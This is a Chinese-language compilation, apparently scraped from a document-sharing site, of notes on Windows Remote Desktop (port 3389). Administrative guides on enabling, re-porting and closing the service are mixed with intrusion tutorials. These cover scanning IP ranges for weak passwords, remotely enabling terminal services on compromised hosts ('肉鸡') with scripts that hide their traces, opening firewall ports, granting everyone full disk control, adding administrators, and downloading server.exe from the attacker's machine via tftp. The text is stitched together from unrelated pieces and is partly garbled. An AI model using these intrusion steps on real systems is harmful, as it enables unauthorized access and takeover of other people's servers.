3389服务器命令
重启远程终端3389服务的三个方法-电脑资料
重启远程终端3389服务的三个方法-电脑资料修改属性法这种方法其实就是对终端服务的系统属性进行修改,让其启动类型从“已禁用”状态修改成“自动”状态,具体操作步骤为:依次单击“开始”“运行”,运行命令“services.msc”,进入系统服务列表界面;从该界面的右侧窗格区域中,找到并双击“Terminalservices”服务,打开该服务的属性设置界面;单击“启动”按钮,将该服务的启动类型设置为“自动”,再单击“确定”,完成远程终端服务的启用。
当然,也可以在系统服务列表界面中,顺便启用Telnet服务。
即使不在服务器本地,也能借助系统控制台窗口来远程修改服务器中的“Terminalservices”服务属性,达到远程开启服务器终端服务的目的。
在远程开启服务器终端服务时,只要先在远端工作站中执行“mmC”命令,打开本地系统的控制台窗口,然后依次单击“文件”“添加/删除管理单元”命令,单击“添加”按钮,将“服务”管理单元导入;在“这个管理单元一直管理”处选中“另一台计算机”,并输入服务器的IP地址,再单击“完成”按钮,最后我们再按前面的方法,修改好“Terminalservices”服务的属性,就能实现远程启用服务器终端服务的目的了。
编辑注册表法这种方法是通过修改与远程终端服务相关的注册表子键,来实现启用远程终端服务的目的:依次单击“开始”“运行”命令,运行命令“regedit”,进入系统注册表编辑窗口;展开注册表分支HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermSe rvice,在对应TermService子键的右侧窗格区域中,找到并双击“Start”键,打开该键的数值设置对话框,在其中输入数字“2”,并单击“确定”,然后重新启动服务器系统,就能将服务器中的远程终端服务启用了。
上面的方法只是在服务器本地进行的,其实在远端工作站中也可以借助该方法将服务器中的终端服务打开。
3389终端服务器超出了最大允许连接数的解决办法
1、找到一台能连上网络的windows2003的机器2、开始–运行–输入“tsmmc.msc”,跳出一个远程桌面控制台3、右键点击左边的“远程桌面”,选择“新建远程桌面”,按照要求填写要连接的虚拟主机的ip、用户名、密码、域名,然后点击“确定”4、点击新建好的远程桌面,就可以登陆到远程虚拟主机了扫尾工作:1、登陆到远程虚拟主机后,打开“任务管理器”,选择“用户”,踢掉那2个留在系统中的用户2、开始-运行-gpedit.msc-计算机配置-管理模板-windows组件-终端服务-会话,右边窗口选择“为断开的会话设置时间限制”-选择已启用,设置一个时间win2K/win2003终端服务器超出最大允许连接数的问题今天管理一台服务器,远程连接时帐号密码都输入完后,点连接后弹出一个“终端服务器超出最大允许连接”。
上网查了一下归结一下出现这种情况的原因和解决办法。
原因:用远程桌面链接登录到终端服务器时经常会遇到“终端服务器超出最大允许链接数”诸如此类错误导致无法正常登录终端服务器,引起该问题的原因在于终端服务的缺省链接数为2个链接,并且当登录远程桌面后如果不是采用注销方式退出,而是直接关闭远程桌面窗口,那么实际上会话并没有释放掉,而是继续保留在服务器端,这样就会占用总的链接数,当这个数量达到最大允许值时就会出现上面的提示。
如何避免?一、用注销来退出远程桌面而不是直接关闭窗口二、限制已断开链接的会话存在时间1、从终端服务配置中修改运行-Tscc.msc(终端服务配置)-连接-双击RDP-Tcp或右击-属性-会话-选中第一个的替代用户设置(O)-结束已断开的会话[将默认值“从不”改为一个适当的时间,比如30分钟]2、从组策略修改开始-运行-gpedit.msc-计算机配置-管理模板-windows组件-终端服务-会话右边窗口选择为断开的会话设置时间限制-选择已启用,选择一个时间三、增加最多链接数1、从终端服务配置中修改:运行-Tscc.msc(终端服务配置)-连接-双击RDP-Tcp 或右击-属性,选择“网卡”选项卡-修改“最大连接数”改成你所需的值,当然这个值不也能太大,否则会占用较多的系统资源。
3389错误解决
客户端无法连接到远程计算机的终端服务(3389)解决办法网管2010-08-27 16:12:21 阅读122 评论0 字号:大中小订阅1、首先确认远程登陆的服务是打开的,也就是Terminal Services服务右键我的电脑--管理--服务,找到Terminal Services服务,启动这个服务即可2、开启远程服务右键我的电脑--属性--远程,勾选“允许用户远程登陆到服务器”当然也可以在注册表中打开,依次展开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server然后在右栏中找到“fDenyTSConnections”键双击打开后将该键值修改为“0”,点击“确定”按钮,最后关闭注册表编辑器。
最后远程重启Windows 2003服务器,即可生效 .素有“远程管理员”之称的Remote Administrator就正是这样一款专为远程管理Windows NT/2000/XP服务器而量身定做的远程控制软件。
Remote Administrator的下载地址是/soft/html/3435.htm。
它的大小仅有2.4M ,比起Pcanywhere 来要秀气的多了。
运行平台:Windows 98/NT/2000/XP。
问题需求:现在局域网中有一台Windows 2000 SEVER的服务器,其IP地址为192.168.0.1,要求对其实现远程管理。
实现步骤:1、首先在本地机与远程机(在本实例中远程机为Windows 2000 SEVER服务器)上分别安装好Remote Administrator.它的安装没有什么难的,打开软件包,一路“NEXT”下去即可。
安装结束以后会出现一个系统提示框:Remote Administrator可以在两种方式下运行.一种是添加到系统设置之中,随着Windows的启动, Remote Administrator就会自动在后台运行;另一种是由管理员手动决定Remote Administrator何时启动.为了系统的安全起见,读者在此推荐后一种。
解决3389端口的安全问题
1.在单位服务器上启动3389远程控制,也就是选择控制面板的“添加删除程序”的“添加删除WINDOWS组件”,找到“终端服务器”将其安装后重新启动计算机完成远程控制启动工作。
2.在服务器上通过任务栏的“开始->运行->输入regedit”,打开注册表编辑器。
3.在注册表中找到hkey_local_machine\system\currentcontrolset\control\terminal server\wds\repwd\tds\tcp,意10进制和16进制数字的区别。
4.在注册表中找到hkey_local_machine\system\currentcontrolset\control\terminal server\WINSTATIONS\RDP-TCP,将其下的portnumber值从3389修改为21,同样注意10进制和16进制数字的区别。全部修改后重新启动服务器就完成了服务器上的全部设置。
如何解决3389端口的安全问题呢?其实我们可以通过修改注册表将远程桌面访问的默认端口3389进行修改,将其修改为类似21或其他常用端口。笔者所在公司就是将其设置为21端口,这样黑客用扫描器扫描服务器时就会发现21端口打开的,他会以为是对外开放了FTP服务,对FTP服务进行攻击,而结果必然是徒劳的。下面简单的为大家介绍一下如何修改默认远程桌面连接端口:
关闭3389端口操作文档
二、关闭3389端口的操作步骤
1. 打开“控制面板”:
2. 点击“系统和安全”选项:
3. 单击“Windows防火墙”选项:
4. 选择左侧“高级设置”,进入Windows防火墙的高级设置界面:
5. 首先单击左侧“入站规则”,然后选择右侧入站规则中的“新建规则”:
6. 新建的入站规则具体设置如下:
1)“规则类型”选项,选择“端口”,继续进行“下一步”:
2)“协议和端口”选项,协议选择“TCP”,端口选择“特定本地端口”,并指定要关闭的远程控制端口3389,继续“下一步”:
3)“操作”选项,选择“阻止连接”,继续“下一步”:
4)“配置文件”选项,直接继续“下一步”:
5)“名称”选项,键入新建规则的名称(填写“阻断远程控制端口3389”),单击“完成”,即可完成3389远程控制端口的关闭。
/nic/info/1452/9825.htm。
windows2003 xp 开3389 dos 命令,入侵专用,
1.查询终端端口REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber2.开启XP&2003终端服务REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f3.更改终端端口为2008(0x7d8)REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /fREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\Standard Profile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f5.开启Win2000的终端(需重启)echo Windows Registry Editor V ersion 5.00 >2000.regecho. >>2000.regecho[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentV ersion\netcache] >>200 0.regecho "Enabled"="0" >>2000.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV ersion\Winlogon] >>2000.regecho "ShutdownWithoutLogon"="0" >>2000.regecho[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg echo "EnableAdminTSRemote"=dword:00000001 >>2000.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.regecho "TSEnabled"=dword:00000001 >>2000.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg echo "Start"=dword:00000002 >>2000.regecho[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.regecho "Start"=dword:00000002 >>2000.regecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.regecho "Hotkey"="1" >>2000.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.regecho "PortNumber"=dword:00000D3D >>2000.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.regecho "PortNumber"=dword:00000D3D >>2000.reg6.解决终端超出了最大连接数的命令mstsc /v:ip:3389 /console。
3389远程登陆窗口
3389端口目录编辑本段3389端口是Windows 2000(2003) Server 远程桌面的服务端口,可以通过这个端口,用"远程桌面"等连接工具来连接到远程的服务器,如果连接上了,输入系统管理员的用户名和密码后,将变得可以像操作本机一样操作远程的电脑,因此远程服务器一般都将这个端口修改数值或者关闭。
编辑本段关闭操作方法3389端口的关闭:首先说明3389端口是windows的远程管理终端所开的端口,它并不是一个木马程序,请先确定该服务是否是你自己开放的。
如果不是必须的,建议关闭该服务。
win2000 server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。
win2000 pro 开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。
windows xp关闭的方法:在我的电脑上点右键选属性-->远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。
开始---运行输入regedit打开注册表[HKEY_LOCAL_MACHINE\System\control\Terminalserver\wds\rdpwd\tds\ tcp分支,选中名为portnumber的键值,将其3389改为其他(如1234)看我操作这里control有2个分别为controlSET001 和controlSET002我一个一个来先进controlSET001在来controlSET002下面我们在看currentcontrolset[HKEY_LOCAL_MACHINE\System\currentcontrolset\control\Terminalser ver\winstations\RDP-Tcp\PortNumber分支里应该有一个或者很多类似的子键,一样的改他的值3389为其他(如1234)。
5种方法开启3389端口
5种方法开启3389端口打开3389的5种方法怎么样开3389端口,这里我把他们总结一下,很全面,希望对你有用:1,打开记事本,编辑内容如下:echo[Components]>c:\sqlechoTSEnable=on>>c:\sqlsysocmgr/i:c:\winnt\inf\sysoc.inf/u:c:\sql/q编辑好后存为BAT文件,上传至肉鸡,执行。
这里值得注意的是要确定winnt 是否在c盘,如果在其他盘则需要改动。
2(对xp\2000都有效)脚本文件本地开3389工具:rots1.05使用方法:在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:c:\>cscriptROTS.vbs<目标IP><用户名><密码>[服务端口][自动重起选项]服务端口:设置终端服务的服务端口。
默认是3389。
自动重起选项:使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。
(如果/r不行,可以试试这个)使用此参数时,端口设置不能忽略。
比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空运行CMD(2000下的DOS),我们给它开终端!命令如下!cscriptreg.vbe222.222.222.222administrator""3389/fr上面的命令应该可以理解吧?cscriptreg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
更改服务器远程3389端口最简单快速的方法
更改服务器远程3389端口最简单快速的方法分类:企业IT架构管理及相关2008-07-10 13:21 1073人阅读评论(1) 收藏举报通过注册表修改3389端口< ----> 为了避免别人扫描远程桌面连接端口,我们可以把3389改端口,方法如下:打开注册表(开始–》运行–》regedit)依次展开以下键:HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/TerminalServer/Wds/rdpwd/Tds/tcp找到PortNumber这个键值,点10进制,改为你想要改成的端口地址,建议大于1024。
还要修改一个地方,展开以下键:HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/TerminalServer/WinStations/RDP-Tcp同样需要修改PortNumber为你想要的端口,注意一定要变成10进制再改,因为默认是16进制的。
以上是WIN2000修改方法。
-------------------------------------------更改服务器远程3389端口最简单快速的方法开始---运行----regeidt--按ctrl+f 输入portnumber 改第二个和第三个,改了之后保存重启。
-----------------如何快速修改3389端口终端步骤:打开“开始→运行”,输入“regedit”,打开注册表,进入以下路径:[HKEY_LOCAL_MACHINE--SYSTEM CurrentControlSet--Control--Terminal Server Wds--rdpwd--Tds--tcp],看见PortNamber值了吗?其默认值是3389,修改成所希望的端口即可,例如12345。
再打开[HKEY_LOCAL_MACHINESYSTEM--CurrentContro1Set--Control--Tenninal Server--WinStations--RDP--Tcp],将PortNumber的值(默认是3389)修改成端口12345。
第4天 从终端服务3389讲起(1)解析
昨天我们讲到了提升权限的问题,好现在我们就来说一个简单的入侵,从3389找个肉鸡(没有肉鸡的话,对自己的技术提高是没好处的,不能老是看却不练啊,陈同学你说对吗?)请各位注意,我这里并不是说什么烂鬼输入法漏洞。
这种漏洞差不多已经绝迹了,太难找了,如果有人找到了,那恭喜你啦。
众所周知,有开3389的一般都是服务器,也就是说有很大可能带局域网的,而内部入侵比外部要方便一点,这对大家是很好的,我想看我这个东西的很多都是学生吧(声明我就个学生哦)。
如何能快速方便的得到开了终端的肉机呢?这需要用到两个工具,都是扫描工具来的,scanner3.0和焦点的xscan。
打开scanner,输入一段IP,范围要大一点,scanner速度很快的。
在“所有端口从”那里都填3389,点击“开始”就可以开工了。
很快的,扫描完成,结果出来了。
点击右下脚的“删除”把多余的IP删了,只留下开了3389的IP。
再点击“保存”,把结果保存到文件夹里。
找到保存文件的目录,打开它。
用记事本的替换功能把它保存为一个纯IP的TXT文件。
“编辑-替换”在“查找内容”里输入要删除的垃圾,再点“全部替换”就行了。
打开xscan,点击左边的蓝色按钮,进入“扫描板块”,只需在“SQL-Server弱口令”“NT-Server弱口令”前打钩,其他都清除掉。
再点击右边的蓝色按钮,进入“扫描参数”,钩上“从文件获取主机列表”,打开刚才替换成纯IP的TXT文件,确定之后就可以扫描了。
这时需要比较长的时间!(注意我是拿3.0为例的,其他的也差不多)。
确定目标,用mstsc(登陆终端的工具,这个我不喜欢用,但确实很容易上手的)登陆对方主机后,打开对方cmd.exe,输入“net use”,先看看有没有人也在连接这部机(安全一点好,毕竟不是在学雷峰啊)。
“net view”命令之后当出现一堆前面带\\字符的就表示~~就表示什么呢??我想大家都非常明白吧!,如果不明白的话,我。
3389远程终端常用CMD入侵命令
rundll32 setupapi,%inf% 1 %temp%\restart.inf
7.禁用TCP/IP端口筛选 (需重启)
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
type tsp.reg
2.开启XP&2003终端服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
3.更改终端端口为20008 (0x4E28)
8.终端超出最大连接数时可用下面的命令来连接
mstsc /v:ip:3389 /console
9.调整NTFS分区权限
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
远程桌面3389连接设置教程
对于下班后又要加班而不想回办公室的人来说,用远程桌面连接进行控制是个很好的方法,说起远程控制其实很多朋友都已经使用过QQ啲远程协助,也有很多人尝试过PCAnyWhere等强大啲远程控制软件了。
然而,很多朋友却忽略了Windows 系统本身就附带啲一个功能―远程桌面连接,其实它啲功能、性能等一点都不弱,上远程桌面操作控制办公室的电脑就完全和在家里用电脑一模一样的!没有任何区别,而且比其他的远程控制工具好用得多!但是在使用远程控制之前必须对电脑作好相应的设置!下面本站就当前最流行的XP系统,win7系统,VISTA这三种系统的远程桌面连接设置方法及远程桌面命令进行详细的图文讲解XP系统远程桌面设置教程!远程桌面是Windows XP Professional 啲一个标准组件(在 Windows XP Home Edition 家庭版中没有包括啲哟),它允许你使用任何基于Windows啲客户端从任何位置,通过任何连接来访问Windows XP Professional啲计算机。
远程桌面可让你可靠地使用远程计算机上啲所有啲应用程序、文件和网络资源,就如同你本人就坐在远程计算机啲面前一样,不仅如此,本地(办公室)运行啲任何应用程序在你使用远程桌面远程(家、会议室、途中)连接后仍会运行。
远程桌面其实可以为我们做很多事,例如可以让我们坐在家里就可以连接到远程电脑啲桌面,可以任意操作远程啲电脑做任何事,如让它打开迅雷下载、整理硬盘随便,下载BT等等,就像实际操作那台电脑一样,呵呵。
心动了吧,那就让我们开始这段操作说明吧!远程桌面主要包括客户端和服务器端,每台Windows XP 都同时包括客户端和服务器端,也就是说他既可以当成客户端来连到别台啲装了Windows XP 啲电脑,并控制他,也可以自己当成服务器端,让别啲电脑来控制自己。
除了XP控制XP外,Win98,Win2000,WinME都可以对XP进行控制啲。
打开3389端口的6种方法
c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
服务端口: 设置终端服务的服务端口。默认是3389。
自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。(如果/r不行,可以试试这个)
特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径,2、在后台安静模式运行,就算肉鸡旁有人也没有关系!3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩,4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件!5、不管肉鸡的winnt装在什么盘上都无所谓!6、安装完终端后会删除在管理工具中的终端快捷图标!7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。8、自动检测肉鸡是不是服务器版,如果不是删除原文件,不执行安装,如果是服务器版就执行安装!9、支持中日韩繁四个版本的win2000服务器版!
4,下载DameWare NT Utilities 3.66.0.0 注册版
安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。
复制启动后出现对方桌面。
在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后OK
3,下载3389自动安装程序-djshao正式版5.0
开启3389的5种方法
开启3389的5种方法一:使用的工具:1:ipcscan扫描器2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IPort )3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品)4:cscript (在system32文件夹下;98操作系统可能没有二:步骤:1:用ipcscan扫描弱口令(你们可以自己扫,我也扫到一些弱口令主机.演实时间我在论坛上再发)2:用rots.vbs开启终端服务说明 cscript ROTS.vbs <目标IP><用户名><密码> [服务端口] [自动重起选项]格式 cscript.exe rots.vbs ip user userpass port /r或者 cscript.exe rots.vbs ip user userpass port /fr三:常见问题:1:脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
因为pro版不能安装终端服务.如果你确信脚本判断错误,就继续安装好了.2:可能会出现:Conneting 202.202.202.202 ....Error0x80070776 .Error description: 没有发现指定的此对象导出者,这个还是放弃吧.3:可能会连接不上,请用这个格式127.0.0.1:1818 1818是刚才开的端口.===================================================================== =====================第二种方法:===================================================================== =====================进入后:TELNET上去!c:>echo [Components] > c:rockc:>echo TSEnable = on >> c:rockc:>sysocmgr /i:c:winntinfsysoc.inf /u:c:rock /q或者!c:>echo [Components] > d:wawac:>echo TSEnable = on >> d:wawac:>sysocmgr /i:c:winntinfsysoc.inf /u:d:wawa /q等会自动启后就OK或者:在本地利用DOS命令edit建立.bat后缀批处理文件(文件名随意) echo [Components] > c:sqlecho TSEnable = on >>c:sqlsysocmgr /i:c:winntinfsysoc.inf /u:c:sql /qnet use ip地址ipc$ 密码 /user:用户名(一般默认:administrator) 利用at time 获取对方服务器时间。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
net time \\目标ip 查看对方时间
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \\ip 查看对方局域网内开启了哪些共享
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy $\svv.exe">\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
morБайду номын сангаас 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
print 文件名 打印文本文件
ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
at 查看所有的计划任务
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中